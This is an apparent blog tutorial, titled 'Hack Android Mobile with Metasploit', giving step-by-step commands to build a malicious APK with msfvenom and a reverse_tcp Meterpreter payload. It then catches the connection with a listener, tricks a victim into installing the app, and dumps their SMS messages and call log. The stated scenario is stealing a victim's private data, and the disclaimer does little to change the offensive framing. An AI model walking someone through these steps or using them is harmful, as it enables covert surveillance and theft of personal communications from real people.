Hack Android Mobile with Metasploit [Same Network]

Disclaimer: This tutorial is only for educational purpose. We are not responsible for any misuse of this tutorial.

Scenario: Victim uses android smart phone. Attackers needs the call log and SMS of the victim.

Requirements:

1. Metasploit

2. Linux/Windows [For demonstration I am using Ubuntu 14.04]

3. Social Engineering

Steps:

1. Open terminal and type “sudo msfconsole”  1111

2. After few seconds metasploit will be loaded.

222

3. Type “use exploit/multi/handler

4. Type “set PAYLOAD android/meterpreter/reverse_tcp

5. Type “set LHOST 10.13.37.107” [LHOST=Attacker’s ip over network]

6. Type “exploit

333

7. After typing exploit we just create a listener which is waiting for an incoming connection.

8. Now let’s make a malicious apk file with metasploit by typing following command:

sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=10.13.37.107 LPORT=4444 > virus.apk

4444

9. You can find virus.apk file in your home folder.

Screenshot from 2015-08-30 15:34:57

10. Send this virus.apk file to victim’s phone and convince him to install it. Whenever victim installs that and opens the file, a remote connection will be made from victim’s IP to attackers IP on port 4444. Our metasploit listener will catch this connection and open a meterpreter session.

5555

11. Type “sysinfo” to check the remote android system information.

6666

12. Type “dump_sms” to dump all SMS of victim.

999

13. Type “dump_calllog” to dump the call history.

7777

Conclusion: This will work on same network. Follow us for our next tutorial where we will show you show to use this exploit on a different network.

Advertisements